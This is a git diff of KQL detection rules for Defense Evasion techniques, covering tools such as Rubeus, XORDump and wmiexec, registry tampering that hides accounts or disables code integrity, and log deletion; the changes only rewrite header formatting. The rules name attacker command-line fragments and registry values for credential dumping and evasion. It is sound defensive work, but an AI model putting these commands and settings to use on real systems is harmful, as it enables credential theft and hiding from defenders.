Florian Roth (Nextron Systems) -// Date: 2018-12-19 -// Level: critical -// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.t1003, attack.t1558.003, attack.lateral-movement, attack.t1550.003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - Rubeus Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2018-12-19 +// Level: critical +// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1003, attack.t1558.003, attack.lateral-movement, attack.t1550.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql b/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql index db9b648f..2c0342aa 100644 --- a/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - SharpEvtMute Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-09-07 -// Level: high -// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 - -DeviceProcessEvents +// Title: HackTool - SharpEvtMute Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-07 +// Level: high +// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 + +DeviceProcessEvents | where FolderPath endswith "\\SharpEvtMute.exe" or ProcessVersionInfoFileDescription =~ "SharpEvtMute" or (ProcessCommandLine contains "--Filter \"rule " or ProcessCommandLine contains "--Encoded --Filter \\\"") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql b/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql index e0279736..23276ec8 100644 --- a/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql +++ b/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Wmiexec Default Powershell Command -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-08 -// Level: high -// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.lateral-movement -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - Wmiexec Default Powershell Command +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-08 +// Level: high +// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.lateral-movement +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql b/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql index 8490e559..959a6a08 100644 --- a/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql +++ b/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - XORDump Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-28 -// Level: high -// Description: Detects suspicious use of XORDump process memory dumping utility -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access -// False Positives: -// - Another tool that uses the command line switches of XORdump - -DeviceProcessEvents +// Title: HackTool - XORDump Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-28 +// Level: high +// Description: Detects suspicious use of XORDump process memory dumping utility +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - Another tool that uses the command line switches of XORdump + +DeviceProcessEvents | where FolderPath endswith "\\xordump.exe" or (ProcessCommandLine contains " -process lsass.exe " or ProcessCommandLine contains " -m comsvcs " or ProcessCommandLine contains " -m dbghelp " or ProcessCommandLine contains " -m dbgcore ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hh_exe_execution.kql b/KQL/rules/Defense Evasion/hh_exe_execution.kql index 97d3017c..98af0a14 100644 --- a/KQL/rules/Defense Evasion/hh_exe_execution.kql +++ b/KQL/rules/Defense Evasion/hh_exe_execution.kql @@ -1,12 +1,12 @@ -// Title: HH.EXE Execution -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community -// Date: 2019-10-24 -// Level: low -// Description: Detects the execution of "hh.exe" to open ".chm" files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.001 -// False Positives: -// - False positives are expected with legitimate ".CHM" - -DeviceProcessEvents +// Title: HH.EXE Execution +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community +// Date: 2019-10-24 +// Level: low +// Description: Detects the execution of "hh.exe" to open ".chm" files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.001 +// False Positives: +// - False positives are expected with legitimate ".CHM" + +DeviceProcessEvents | where ProcessCommandLine contains ".chm" and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql index 4be85f32..04d4584f 100644 --- a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql +++ b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql @@ -1,13 +1,13 @@ -// Title: Hidden Flag Set On File/Directory Via Chflags - MacOS -// Author: Omar Khaled (@beacon_exe) -// Date: 2024-08-21 -// Level: medium -// Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. -// When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 -// False Positives: -// - Legitimate usage of chflags by administrators and users. - -DeviceProcessEvents +// Title: Hidden Flag Set On File/Directory Via Chflags - MacOS +// Author: Omar Khaled (@beacon_exe) +// Date: 2024-08-21 +// Level: medium +// Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. +// When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 +// False Positives: +// - Legitimate usage of chflags by administrators and users. + +DeviceProcessEvents | where ProcessCommandLine contains "hidden " and FolderPath endswith "/chflags" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hidden_user_creation.kql b/KQL/rules/Defense Evasion/hidden_user_creation.kql index 90195830..b494e414 100644 --- a/KQL/rules/Defense Evasion/hidden_user_creation.kql +++ b/KQL/rules/Defense Evasion/hidden_user_creation.kql @@ -1,12 +1,12 @@ -// Title: Hidden User Creation -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-10 -// Level: medium -// Description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.002 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Hidden User Creation +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-10 +// Level: medium +// Description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.002 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "UniqueID" and ProcessCommandLine matches regex "([0-9]|[1-9][0-9]|[1-4][0-9]{2})")) or ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "IsHidden" and (ProcessCommandLine contains "true" or ProcessCommandLine contains "yes" or ProcessCommandLine contains "1"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql index d58aa952..d34e214f 100644 --- a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql +++ b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql @@ -1,13 +1,13 @@ -// Title: Hide Schedule Task Via Index Value Tamper -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-26 -// Level: high -// Description: Detects when the "index" value of a scheduled task is modified from the registry -// Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Hide Schedule Task Via Index Value Tamper +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-26 +// Level: high +// Description: Detects when the "index" value of a scheduled task is modified from the registry +// Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql b/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql index 330fa07c..22143a10 100644 --- a/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql +++ b/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql @@ -1,13 +1,13 @@ -// Title: Hiding Files with Attrib.exe -// Author: Sami Ruohonen -// Date: 2019-01-16 -// Level: medium -// Description: Detects usage of attrib.exe to hide files from users. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.001 -// False Positives: -// - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) -// - Msiexec.exe hiding desktop.ini - -DeviceProcessEvents +// Title: Hiding Files with Attrib.exe +// Author: Sami Ruohonen +// Date: 2019-01-16 +// Level: medium +// Description: Detects usage of attrib.exe to hide files from users. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 +// False Positives: +// - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) +// - Msiexec.exe hiding desktop.ini + +DeviceProcessEvents | where (ProcessCommandLine contains " +h " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")) and (not(ProcessCommandLine contains "\\desktop.ini ")) and (not((ProcessCommandLine =~ "+R +H +S +A \\*.cui" and InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat" and InitiatingProcessFolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql index e0df0a0f..f5eca91e 100644 --- a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql +++ b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql @@ -1,10 +1,10 @@ -// Title: Hiding User Account Via SpecialAccounts Registry Key -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2022-07-12 -// Level: high -// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.002 - -DeviceRegistryEvents +// Title: Hiding User Account Via SpecialAccounts Registry Key +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2022-07-12 +// Level: high +// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.002 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql index 7fe4baed..d83a052d 100644 --- a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql +++ b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql @@ -1,12 +1,12 @@ -// Title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine -// Author: @Kostastsale, TheDFIRReport -// Date: 2022-05-14 -// Level: medium -// Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.002 -// False Positives: -// - System administrator activities - -DeviceProcessEvents +// Title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-05-14 +// Level: medium +// Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.002 +// False Positives: +// - System administrator activities + +DeviceProcessEvents | where (ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" and ProcessCommandLine contains "add" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/d 0") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql b/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql index 09522f85..48624a27 100644 --- a/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql +++ b/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql @@ -1,10 +1,10 @@ -// Title: HTML Help HH.EXE Suspicious Child Process -// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-04-01 -// Level: high -// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 - -DeviceProcessEvents +// Title: HTML Help HH.EXE Suspicious Child Process +// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-04-01 +// Level: high +// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 + +DeviceProcessEvents | where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql index abb0fcb4..fb262fb1 100644 --- a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql +++ b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql @@ -1,10 +1,10 @@ -// Title: Hypervisor Enforced Code Integrity Disabled -// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati -// Date: 2023-03-14 -// Level: high -// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceRegistryEvents +// Title: Hypervisor Enforced Code Integrity Disabled +// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati +// Date: 2023-03-14 +// Level: high +// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql index 25a29ba0..7db4db68 100644 --- a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql +++ b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql @@ -1,10 +1,10 @@ -// Title: Hypervisor Enforced Paging Translation Disabled -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-07-05 -// Level: high -// Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceRegistryEvents +// Title: Hypervisor Enforced Paging Translation Disabled +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-05 +// Level: high +// Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\DisableHypervisorEnforcedPagingTranslation" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql index 1537c8b3..c0dc15c6 100644 --- a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql +++ b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql @@ -1,10 +1,10 @@ -// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols -// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea) -// Date: 2023-09-05 -// Level: high -// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceRegistryEvents +// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols +// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea) +// Date: 2023-09-05 +// Level: high +// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents | where RegistryValueData contains "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and (RegistryKey endswith "\\http" or RegistryKey endswith "\\https") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql b/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql index 3abdf710..2f46e888 100644 --- a/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql +++ b/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql @@ -1,13 +1,13 @@ -// Title: IIS WebServer Access Logs Deleted -// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-16 -// Level: medium -// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070 -// False Positives: -// - During uninstallation of the IIS service -// - During log rotation - -DeviceFileEvents +// Title: IIS WebServer Access Logs Deleted +// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-16 +// Level: medium +// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 +// False Positives: +// - During uninstallation of the IIS service +// - During log rotation + +DeviceFileEvents | where FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql index 2514a852..56c833c8 100644 --- a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql +++ b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql @@ -1,14 +1,14 @@ -// Title: IIS WebServer Log Deletion via CommandLine Utilities -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-09-02 -// Level: medium -// Description: Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks. -// Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070 -// False Positives: -// - Deletion of IIS logs that are older than a certain retention period as part of regular maintenance activities. -// - Legitimate schedule tasks or scripts that clean up log files regularly. - -DeviceProcessEvents +// Title: IIS WebServer Log Deletion via CommandLine Utilities +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-02 +// Level: medium +// Description: Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks. +// Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 +// False Positives: +// - Deletion of IIS logs that are older than a certain retention period as part of regular maintenance activities. +// - Legitimate schedule tasks or scripts that clean up log files regularly. + +DeviceProcessEvents | where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase " or ProcessCommandLine contains "rm " or ProcessCommandLine contains "remove-item " or ProcessCommandLine contains "rmdir ") and ProcessCommandLine contains "\\inetpub\\logs\\" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "powershell.exe", "powershell_ise.exe", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql b/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql index e029eef4..eb1ce306 100644 --- a/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql +++ b/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql @@ -1,10 +1,10 @@ -// Title: ImagingDevices Unusual Parent/Child Processes -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-27 -// Level: high -// Description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution - -DeviceProcessEvents +// Title: ImagingDevices Unusual Parent/Child Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-27 +// Level: high +// Description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\ImagingDevices.exe" or (FolderPath endswith "\\ImagingDevices.exe" and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql b/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql index df92991d..32f3bf54 100644 --- a/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql +++ b/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql @@ -1,12 +1,12 @@ -// Title: Indicator Removal on Host - Clear Mac System Logs -// Author: remotephone, oscd.community -// Date: 2020-10-11 -// Level: medium -// Description: Detects deletion of local audit logs -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.002 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Indicator Removal on Host - Clear Mac System Logs +// Author: remotephone, oscd.community +// Date: 2020-10-11 +// Level: medium +// Description: Detects deletion of local audit logs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.002 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and (ProcessCommandLine contains "/var/log" or (ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Logs/")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql b/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql index 87b18b56..2a12c40e 100644 --- a/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql +++ b/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql @@ -1,13 +1,13 @@ -// Title: Indirect Command Execution By Program Compatibility Wizard -// Author: A. Sungurov , oscd.community -// Date: 2020-10-12 -// Level: low -// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.execution -// False Positives: -// - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts -// - Legit usage of scripts - -DeviceProcessEvents +// Title: Indirect Command Execution By Program Compatibility Wizard +// Author: A. Sungurov , oscd.community +// Date: 2020-10-12 +// Level: low +// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution +// False Positives: +// - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as 